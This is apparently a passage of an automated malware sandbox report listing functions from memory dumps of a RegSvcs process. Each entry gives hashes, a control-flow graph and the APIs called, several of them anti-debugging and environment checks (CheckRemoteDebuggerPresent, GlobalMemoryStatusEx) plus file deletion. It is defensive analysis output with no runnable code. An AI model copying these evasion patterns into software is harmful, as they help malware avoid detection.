                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7cd09b2dab4f350b9efa4bf008eb93789a5aa6b1ca057b1a2b9caf7cc680a272
                                                                        • Instruction ID: 3538c94b65e6af91daff49a32569721689c2ac6a8f8a8dc486a22a95caf66597
                                                                        • Opcode Fuzzy Hash: 7cd09b2dab4f350b9efa4bf008eb93789a5aa6b1ca057b1a2b9caf7cc680a272
                                                                        • Instruction Fuzzy Hash: 86914C70E00209DFDF15DFA9DC897ADBBF2AF88714F148129E815AB354EB349885CB91
                                                                        Function 0167F79B Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 736 167f79b-167f7b9 739 167f7bf-167f84c GlobalMemoryStatusEx 736->739 740 167f7bb-167f7be 736->740 743 167f855-167f87d 739->743 744 167f84e-167f854 739->744 744->743
                                                                        APIs
                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 0167F83F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalMemoryStatus
                                                                        • String ID:
                                                                        • API String ID: 1890195054-0
                                                                        • Opcode ID: 7cff1e69e3f66361a021abf5253a35f18f1e22c89fefbc3fd0e4ea9db659c41a
                                                                        • Instruction ID: 6ad90e6331779857fd17ed60d2e562cd881731c9352182e00720e7d72ca11c8e
                                                                        • Opcode Fuzzy Hash: 7cff1e69e3f66361a021abf5253a35f18f1e22c89fefbc3fd0e4ea9db659c41a
                                                                        • Instruction Fuzzy Hash: AF219AB1C0025ACFDB10CFA9C8447EEBBF4AF08310F15856AD914A7340D3389841CFA0
                                                                        Function 01677FD0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 747 1677fd0-167805c CheckRemoteDebuggerPresent 750 1678065-16780a0 747->750 751 167805e-1678064 747->751 751->750
                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0167804F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: 19fff29062ebbab62677397c6544efa8b171fcdca783332a2f5345f64604447f
                                                                        • Instruction ID: ff2c94d66017ce6312490b0a75eadafa4389bec09bcedd84a3b3cdbde5035fe8
                                                                        • Opcode Fuzzy Hash: 19fff29062ebbab62677397c6544efa8b171fcdca783332a2f5345f64604447f
                                                                        • Instruction Fuzzy Hash: B6214AB280125ACFDB10CF99C884BEEFBF4AF49310F14845AE455A7251D3789944CF61
                                                                        Function 01677FD8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 754 1677fd8-167805c CheckRemoteDebuggerPresent 757 1678065-16780a0 754->757 758 167805e-1678064 754->758 758->757
                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0167804F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: 5ef63de9b506027b27e060c7f643da427e8c8f34d51ac12da453d7e0a42c1c65
                                                                        • Instruction ID: adeb8156f8b0886048d3ac7e84051d1e750948976c97440619403e58e3115eb7
                                                                        • Opcode Fuzzy Hash: 5ef63de9b506027b27e060c7f643da427e8c8f34d51ac12da453d7e0a42c1c65
                                                                        • Instruction Fuzzy Hash: 122157B2800259CFDB10CF9AC884BEEFBF4AF48320F14842AE458A7351D738A944CF60
                                                                        Function 01678B42 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 761 1678b42-1678b92 763 1678b94-1678b97 761->763 764 1678b9a-1678bc5 DeleteFileW 761->764 763->764 765 1678bc7-1678bcd 764->765 766 1678bce-1678bf6 764->766 765->766
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 01678BB8
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0
                                                                        • Opcode ID: 8ec19b37388f6f6d59e14ee54fd8359d50c5b9949ce4bd8b0a62205cde0e763f
                                                                        • Instruction ID: cc2e7c6aa0db1692f01b224c4518745ac0d9a21339033eb9f446826234ee80b6
                                                                        • Opcode Fuzzy Hash: 8ec19b37388f6f6d59e14ee54fd8359d50c5b9949ce4bd8b0a62205cde0e763f
                                                                        • Instruction Fuzzy Hash: E12113B2C0065ACFDB14CF9AC9447EEFBB4EF48720F14856AD958A7240D338A945CFA5
                                                                        Function 01678B48 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 769 1678b48-1678b92 771 1678b94-1678b97 769->771 772 1678b9a-1678bc5 DeleteFileW 769->772 771->772 773 1678bc7-1678bcd 772->773 774 1678bce-1678bf6 772->774 773->774
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 01678BB8
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0
                                                                        • Opcode ID: 48496a18a3a58028d0969a6ca0b31f13f70d0ba80c489cd2a26268552edc827e
                                                                        • Instruction ID: fc56e1de481ce6abbe10d34ee96391863522be90504c6043de0a6e11b5de17c8
                                                                        • Opcode Fuzzy Hash: 48496a18a3a58028d0969a6ca0b31f13f70d0ba80c489cd2a26268552edc827e
                                                                        • Instruction Fuzzy Hash: 3B1136B1C0061ADFDB14CF9AC844BAEFBB4EF48720F14812AD918A7340D338A940CFA5
                                                                        Function 0167F7D8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 777 167f7d8-167f84c GlobalMemoryStatusEx 779 167f855-167f87d 777->779 780 167f84e-167f854 777->780 780->779
                                                                        APIs
                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 0167F83F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalMemoryStatus
                                                                        • String ID:
                                                                        • API String ID: 1890195054-0
                                                                        • Opcode ID: d4fd57280b419df38155fcb3cd4beeefa1a120d1f3b58791222e6a5a42fa29da
                                                                        • Instruction ID: f8fcc0c74a3ac1053c4b86155e2b9233dc8d9be626ae54ad8b34f1800a1b1b83
                                                                        • Opcode Fuzzy Hash: d4fd57280b419df38155fcb3cd4beeefa1a120d1f3b58791222e6a5a42fa29da
                                                                        • Instruction Fuzzy Hash: 971112B1C0066A9FDB10CF9AC844BDEFBF4AF48720F15816AD918A7240D378A940CFA5
                                                                        Function 06E5FE80 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1309 6e5fe80-6e5feae 1322 6e5feb1 call 167f260 1309->1322 1323 6e5feb1 call 167f268 1309->1323 1310 6e5feb7-6e5fed6 1314 6e5fede-6e5ff08 1310->1314 1317 6e5ff29 1314->1317 1318 6e5ff0a-6e5ff27 1314->1318 1319 6e5ff3b-6e5ff42 1317->1319 1318->1319 1322->1310 1323->1310
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: |
                                                                        • API String ID: 0-2343686810
                                                                        • Opcode ID: 478f0d367a7e107dcf998d5b11b7e50950abd298542e0d7d7307a47c47c917fd
                                                                        • Instruction ID: 26898e07b06044c1bbb30eaa1f5e3cf2efc1975ad03003e8ca14cd9b8ebc79b7
                                                                        • Opcode Fuzzy Hash: 478f0d367a7e107dcf998d5b11b7e50950abd298542e0d7d7307a47c47c917fd
                                                                        • Instruction Fuzzy Hash: F5117F71B10224CFDB409B788808B6E7BF6AF8C600F114469E91AE73A0EB35AD41CF90
                                                                        Function 06E5FE90 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1324 6e5fe90-6e5feae 1325 6e5feb7-6e5fed6 1324->1325 1337 6e5feb1 call 167f260 1324->1337 1338 6e5feb1 call 167f268 1324->1338 1329 6e5fede-6e5ff08 1325->1329 1332 6e5ff29 1329->1332 1333 6e5ff0a-6e5ff27 1329->1333 1334 6e5ff3b-6e5ff42 1332->1334 1333->1334 1337->1325 1338->1325
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: |
                                                                        • API String ID: 0-2343686810
                                                                        • Opcode ID: 4b2e48c30138296cd24f50e5f212a8f1fc1a5fe4dfc96e2ed1d358c9432311e4
                                                                        • Instruction ID: 7f11826c0d420495d3f6e9e421a2248ccce895e6350445533270e5c7307fd46a
                                                                        • Opcode Fuzzy Hash: 4b2e48c30138296cd24f50e5f212a8f1fc1a5fe4dfc96e2ed1d358c9432311e4
                                                                        • Instruction Fuzzy Hash: 7F115E74B10214DFDB549B78C808B6E7BF5AF4C710F104469EA0AD7390EB35AD01CB94
                                                                        Function 06E52338 Relevance: 1.0, Instructions: 982COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 27011956fdcb3d90702b468833a1175d5a3f2f43b7410b72d6f83e3036a67453
                                                                        • Instruction ID: 769ec7b95b7fc8c59dfc9477d4ea3a8da11fca6cdb9bf3456c6b88d23dbb4639
                                                                        • Opcode Fuzzy Hash: 27011956fdcb3d90702b468833a1175d5a3f2f43b7410b72d6f83e3036a67453
                                                                        • Instruction Fuzzy Hash: 68925530A00305CFDB64DB68C588A5DB7F2FB44318F5694AAE949AB361DB35ED85CF80
                                                                        Function 06E5CEF8 Relevance: .8, Instructions: 796COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2630 6e5cef8-6e5cf13 2631 6e5cf15-6e5cf18 2630->2631 2632 6e5cf61-6e5cf64 2631->2632 2633 6e5cf1a-6e5cf29 2631->2633 2634 6e5cf66-6e5cf6b 2632->2634 2635 6e5cf6e-6e5cf71 2632->2635 2636 6e5cf38-6e5cf44 2633->2636 2637 6e5cf2b-6e5cf30 2633->2637 2634->2635 2638 6e5cf73-6e5cfb5 2635->2638 2639 6e5cfba-6e5cfbd 2635->2639 2640 6e5d915-6e5d94e 2636->2640 2641 6e5cf4a-6e5cf5c 2636->2641 2637->2636 2638->2639 2642 6e5d006-6e5d009 2639->2642 2643 6e5cfbf-6e5cfce 2639->2643 2654 6e5d950-6e5d953 2640->2654 2641->2632 2645 6e5d052-6e5d055 2642->2645 2646 6e5d00b-6e5d04d 2642->2646 2649 6e5cfd0-6e5cfd5 2643->2649 2650 6e5cfdd-6e5cfe9 2643->2650 2651 6e5d3e4-6e5d3f0 2645->2651 2652 6e5d05b-6e5d05e 2645->2652 2646->2645 2649->2650 2650->2640 2653 6e5cfef-6e5d001 2650->2653 2651->2643 2661 6e5d3f6-6e5d6e3 2651->2661 2655 6e5d0a7-6e5d0aa 2652->2655 2656 6e5d060-6e5d0a2 2652->2656 2653->2642 2659 6e5d955-6e5d971 2654->2659 2660 6e5d976-6e5d979 2654->2660 2663 6e5d0c7-6e5d0ca 2655->2663 2664 6e5d0ac-6e5d0c2 2655->2664 2656->2655 2659->2660 2665 6e5d9ac-6e5d9af 2660->2665 2666 6e5d97b-6e5d9a7 2660->2666 2843 6e5d6e9-6e5d6ef 2661->2843 2844 6e5d90a-6e5d914 2661->2844 2670 6e5d0cc-6e5d0ce 2663->2670 2671 6e5d0d9-6e5d0dc 2663->2671 2664->2663 2667 6e5d9b1 call 6e5da6d 2665->2667 2668 6e5d9be-6e5d9c0 2665->2668 2666->2665 2683 6e5d9b7-6e5d9b9 2667->2683 2677 6e5d9c7-6e5d9ca 2668->2677 2678 6e5d9c2 2668->2678 2679 6e5d0d4 2670->2679 2680 6e5d3e1 2670->2680 2681 6e5d125-6e5d128 2671->2681 2682 6e5d0de-6e5d120 2671->2682 2677->2654 2686 6e5d9cc-6e5d9db 2677->2686 2678->2677 2679->2671 2680->2651 2684 6e5d137-6e5d13a 2681->2684 2685 6e5d12a-6e5d12c 2681->2685 2682->2681 2683->2668 2695 6e5d183-6e5d186 2684->2695 2696 6e5d13c-6e5d17e 2684->2696 2693 6e5d132 2685->2693 2694 6e5d29f-6e5d2a8 2685->2694 2710 6e5da42-6e5da57 2686->2710 2711 6e5d9dd-6e5da40 call 6e56138 2686->2711 2693->2684 2698 6e5d2b7-6e5d2c3 2694->2698 2699 6e5d2aa-6e5d2af 2694->2699 2704 6e5d1cf-6e5d1d2 2695->2704 2705 6e5d188-6e5d1ca 2695->2705 2696->2695 2707 6e5d3d4-6e5d3d9 2698->2707 2708 6e5d2c9-6e5d2dd 2698->2708 2699->2698 2713 6e5d1d4-6e5d216 2704->2713 2714 6e5d21b-6e5d21e 2704->2714 2705->2704 2707->2680 2708->2680 2730 6e5d2e3-6e5d2f5 2708->2730 2738 6e5da58 2710->2738 2711->2710 2713->2714 2717 6e5d241-6e5d244 2714->2717 2718 6e5d220-6e5d23c 2714->2718 2726 6e5d246-6e5d288 2717->2726 2727 6e5d28d-6e5d28f 2717->2727 2718->2717 2726->2727 2736 6e5d296-6e5d299 2727->2736 2737 6e5d291 2727->2737 2750 6e5d2f7-6e5d2fd 2730->2750 2751 6e5d319-6e5d31b 2730->2751 2736->2631 2736->2694 2737->2736 2738->2738 2755 6e5d301-6e5d30d 2750->2755 2756 6e5d2ff 2750->2756 2758 6e5d325-6e5d331 2751->2758 2761 6e5d30f-6e5d317 2755->2761 2756->2761 2771 6e5d333-6e5d33d 2758->2771 2772 6e5d33f 2758->2772 2761->2758 2775 6e5d344-6e5d346 2771->2775 2772->2775 2775->2680 2777 6e5d34c-6e5d368 call 6e56138 2775->2777 2788 6e5d377-6e5d383 2777->2788 2789 6e5d36a-6e5d36f 2777->2789 2788->2707 2790 6e5d385-6e5d3d2 2788->2790 2789->2788 2790->2680 2845 6e5d6f1-6e5d6f6 2843->2845 2846 6e5d6fe-6e5d707 2843->2846 2845->2846 2846->2640 2847 6e5d70d-6e5d720 2846->2847 2849 6e5d726-6e5d72c 2847->2849 2850 6e5d8fa-6e5d904 2847->2850 2851 6e5d72e-6e5d733 2849->2851 2852 6e5d73b-6e5d744 2849->2852 2850->2843 2850->2844 2851->2852 2852->2640 2853 6e5d74a-6e5d76b 2852->2853 2856 6e5d76d-6e5d772 2853->2856 2857 6e5d77a-6e5d783 2853->2857 2856->2857 2857->2640 2858 6e5d789-6e5d7a6 2857->2858 2858->2850 2861 6e5d7ac-6e5d7b2 2858->2861 2861->2640 2862 6e5d7b8-6e5d7d1 2861->2862 2864 6e5d7d7-6e5d7fe 2862->2864 2865 6e5d8ed-6e5d8f4 2862->2865 2864->2640 2868 6e5d804-6e5d80e 2864->2868 2865->2850 2865->2861 2868->2640 2869 6e5d814-6e5d82b 2868->2869 2871 6e5d82d-6e5d838 2869->2871 2872 6e5d83a-6e5d855 2869->2872 2871->2872 2872->2865 2877 6e5d85b-6e5d874 call 6e56138 2872->2877 2881 6e5d876-6e5d87b 2877->2881 2882 6e5d883-6e5d88c 2877->2882 2881->2882 2882->2640 2883 6e5d892-6e5d8e6 2882->2883 2883->2865
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ad7cb1ab6717c6d8296013b22c6aabc34a49c41d3f1048166e0e8f1d4d2f4e49
                                                                        • Instruction ID: 2d089abe8bb2cc1f5a9465e69ccba11904df3e1f307bf30d0fdbc8d746810d1c
                                                                        • Opcode Fuzzy Hash: ad7cb1ab6717c6d8296013b22c6aabc34a49c41d3f1048166e0e8f1d4d2f4e49
                                                                        • Instruction Fuzzy Hash: 10627930A0020ACFDB55EB68D890B5EB7B2FF88314F219A68D5059F354DB75ED86CB84
                                                                        Function 06E5B5F0 Relevance: .5, Instructions: 468COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8756c8aa38e0e04ca6400736354861907dadfc168013f043cdfd57a83e89f295
                                                                        • Instruction ID: b518eab80ef80b87a1728e3cd4e86ec798f60adee929ab7cf9227dc0680a6c1e
                                                                        • Opcode Fuzzy Hash: 8756c8aa38e0e04ca6400736354861907dadfc168013f043cdfd57a83e89f295
                                                                        • Instruction Fuzzy Hash: 75028B30E1030A8FDBA4CF68C4A07ADB7B2EB85304F21992AD815DB355DB74EC85CB91
                                                                        Function 06E5AC70 Relevance: .4, Instructions: 389COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3f5f6ef88891890eb872d2f22f9c6db72b8c52af66f6907d45580f341c3b732c
                                                                        • Instruction ID: e48ec51180d090693e5ba0a70973d562156d79f56ac8738968b45f7a038bd909
                                                                        • Opcode Fuzzy Hash: 3f5f6ef88891890eb872d2f22f9c6db72b8c52af66f6907d45580f341c3b732c
                                                                        • Instruction Fuzzy Hash: 5FE15D30E1030A8FDB65DF68D9946AEB7B2EF89304F219629D806DB351DB35DC46CB90
                                                                        Function 06E56179 Relevance: .3, Instructions: 312COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8d866caa7cc6dabea4513886ecab045192286f0d159b2587a4f8cff45dc28b48
                                                                        • Instruction ID: 1109c8f7bc2dff09f541d038052cb9d4ccbd958ced35c27e696f4ec0e97f6f3c
                                                                        • Opcode Fuzzy Hash: 8d866caa7cc6dabea4513886ecab045192286f0d159b2587a4f8cff45dc28b48
                                                                        • Instruction Fuzzy Hash: CDC16D34A002098FDF54DBA8D584AADBBB2FF88314F659429EC06DB365DB34ED42CB40
                                                                        Function 06E589C8 Relevance: .3, Instructions: 262COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 97adb517fd3a4623fd13b3c40872b06691de1bf66b112cbe89e1fe7c939a81ae
                                                                        • Instruction ID: 8566e7a9c7022eaec396b99adb4edff67477511ab975c19d26f4129c09a642c9
                                                                        • Opcode Fuzzy Hash: 97adb517fd3a4623fd13b3c40872b06691de1bf66b112cbe89e1fe7c939a81ae
                                                                        • Instruction Fuzzy Hash: 77A14B30B013568FEB54DF78C85076EB7B2FF88200F1045A9D90AAB395EA35DD86CB91
                                                                        Function 06E590F0 Relevance: .2, Instructions: 230COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1212b4923b7f244a17d1062956da915eb84212c11478590b467db0d79c442182
                                                                        • Instruction ID: 785dc0659452386452474b1d010563670bb1af8a140e78ebf70ed0c2f79d95bb
                                                                        • Opcode Fuzzy Hash: 1212b4923b7f244a17d1062956da915eb84212c11478590b467db0d79c442182
                                                                        • Instruction Fuzzy Hash: BF913B34B1125ACFEB94DF64D9507AEB3F6EF88200F108569C80AEB345EE74DD468B91
                                                                        Function 06E55D88 Relevance: .2, Instructions: 229COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 23e21f8c95115ff542d9b4e0c75d30d233dd06aadfe650b3a2ab97e0b4df6b37
                                                                        • Instruction ID: 4305d67922274b31f1f2d10a64943b35c29206cadd019fc33cb8c844095bd396
                                                                        • Opcode Fuzzy Hash: 23e21f8c95115ff542d9b4e0c75d30d233dd06aadfe650b3a2ab97e0b4df6b37
                                                                        • Instruction Fuzzy Hash: 9D61B371F011114BDF509A6DCC88A6FBAD7EFC4614F25403AD80ADB3A0DE65DC0287D5
                                                                        Function 06E53E51 Relevance: .2, Instructions: 222COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c4d31192757c1efbf2fc48ba0bf96293ab5d8dfcc946692d77b0ae9e305de40d
                                                                        • Instruction ID: d0bc51af04cd345fe6c40c925d0c6480d676a5022c0f99a59dc105ea73e588ea
                                                                        • Opcode Fuzzy Hash: c4d31192757c1efbf2fc48ba0bf96293ab5d8dfcc946692d77b0ae9e305de40d
                                                                        • Instruction Fuzzy Hash: 3A814E30B112098FDF54DFA8D4546AEB7F2EF89304F219429E80ADB395EB35EC468B51
                                                                        Function 06E54174 Relevance: .2, Instructions: 217COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3b97dfcb4b8eb8835ba5138f239e7a0913f2c631a544a1ace675b263a7217ab8
                                                                        • Instruction ID: ba080b108969643a0e0f27bce19a92a1d2fee39aefc9adfe6067f297421d0078
                                                                        • Opcode Fuzzy Hash: 3b97dfcb4b8eb8835ba5138f239e7a0913f2c631a544a1ace675b263a7217ab8
                                                                        • Instruction Fuzzy Hash: 26915030E1061ACBDF50DF68C880B9DB7B1FF89314F208599D549AB395DB71A986CF50
                                                                        Function 06E54188 Relevance: .2, Instructions: 210COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e239b818827de75531f5c526b8177cdc3cbb784099d1f6904e239068ed7260f7
                                                                        • Instruction ID: f5a5a52ff202f0cd843904aa2c1c792a70125a10afaa35b6e5b95ff16287f443
                                                                        • Opcode Fuzzy Hash: e239b818827de75531f5c526b8177cdc3cbb784099d1f6904e239068ed7260f7
                                                                        • Instruction Fuzzy Hash: 57913F30E1061ACBDF60DF68C880B9DB7B1FF89314F208599D549AB394DB71A986CF90
                                                                        Function 06E5EAB9 Relevance: .2, Instructions: 203COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4e4b1988ff36550ab2b9a5a9e754fd535adc62c69a17c2f793d3f6e3818f64c1
                                                                        • Instruction ID: c41354f350d93c86c7ee32dcea7cb2d80a7875c83898fd487fd25a52ce31689f
                                                                        • Opcode Fuzzy Hash: 4e4b1988ff36550ab2b9a5a9e754fd535adc62c69a17c2f793d3f6e3818f64c1
                                                                        • Instruction Fuzzy Hash: 20714970A002099FDB54DFA9D984AAEBBF6FF88304F259429D506EB354DB30ED46CB40
                                                                        Function 06E5EAC8 Relevance: .2, Instructions: 201COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 832ab5923320078913052dfb80a27f64e3e8fa6acacc1dac17031631855d3996
                                                                        • Instruction ID: 16f0747e0dc49250a3c5598c904e6d4352390eeff4acdfa847a3009944e2b320
                                                                        • Opcode Fuzzy Hash: 832ab5923320078913052dfb80a27f64e3e8fa6acacc1dac17031631855d3996
                                                                        • Instruction Fuzzy Hash: 5A712A70A002499FDB54DFA9D980AAEBBF6FF88304F259429D506EB354DB30ED46CB50
                                                                        Function 06E54720 Relevance: .2, Instructions: 186COMMON
                                                                        Download Yara Rule
